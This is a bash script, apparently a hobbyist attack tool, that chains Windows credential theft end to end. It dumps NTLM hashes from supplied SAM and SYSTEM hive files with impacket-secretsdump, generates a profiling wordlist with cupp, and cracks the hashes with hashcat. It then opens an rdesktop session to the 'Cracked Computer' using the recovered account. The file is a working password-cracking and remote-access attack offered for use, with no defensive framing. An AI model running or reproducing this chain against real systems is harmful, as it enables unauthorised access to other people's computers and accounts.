#!/bin/bash

#Colors
cyan='\e[0;36m'
lightcyan='\e[96m'
green='\e[0;32m'
lightgreen='\e[1;32m'
white='\e[1;37m'
red='\e[1;31m'
yellow='\e[1;33m'
blue='\e[1;34m'
cyan='\e[0;36m'
green='\e[0;34m'
okegreen='\033[92m'
lightgreen='\e[1;32m'
white='\e[1;37m'
red='\e[1;31m'
yellow='\e[1;33m'
BlueF='\e[1;34m'


sudo ./banner

echo -e $yellow""
read -p "Enter Your Sam File Path :" sam

read -p "Enter Your system File Path :" system


sudo impacket-secretsdump -sam $sam -system $system LOCAL

read -p "Enter the hash :" hash

read -p "Enter the file name store the hash :" hashs

sudo touch  $hashs.txt
 
sudo echo -e $hash> $hashs.txt
echo -e $green""
read -p "Enter The File name To generate Wordlist :" wordlist
cupp -i 

ls | grep $wordlist.txt

echo -e $red""
echo -e "============================================================================"
echo -e "============================================================================"
sudo hashcat -m 1000 $hashs.txt $wordlist
echo -e "============================================================================"
echo -e "============================================================================"
echo -e "============================================================================"
echo -e "============================================================================"
echo -e "============================================================================"
echo -e "============================================================================"
echo -e $yellow""
sudo hashcat -m 1000 $hashs.txt $wordlist --show
echo -e $red""
echo -e "============================================================================"
echo -e "============================================================================"
echo -e "//////////////////////////////////////////////"
echo -e "The password is the texet after the hash in yellow color!!"
echo -e "//////////////////////////////////////////////"
sleep 4
     echo -e "Do you Want to continue The attack"
    echo
        sleep 0.05
        echo -e $white"	[$okegreen"1"$white]$cyan YES" 
        sleep 0.05
        echo -e $white"	[$okegreen"2"$white]$cyan no" 
        sleep 0.05
      echo 
        echo -n -e $red'  \033[4mmelkam@Abugida:\033[0m '; tput sgr0

read choice

if [[ $choice == 1 ]]; then
         
            
          echo -e "============================================"
          read -p "Enter The ip of the Cracked Computer :" ip
          echo -e "============================================" 
          echo -e "============================================"
          read -p "Enter The Name of the Cracked Computer :" name
          echo -e "============================================" 
          echo -e "============================================"
        
          
          
              sudo  xterm -hold -fa monaco -fs 8 -bg black -e rdesktop -u "$name" -p- $ip
           

              echo -e $red
             echo -e "The exploit Completed Succusfully!!"

            
elif [[ $choice == 2 ]]; then
    echo -e $green
    echo -e "====================================="
      echo -e "We back To main script :" 
    echo -e "====================================="
   
else
     echo "The CHoice you enterd is invalid"

fi
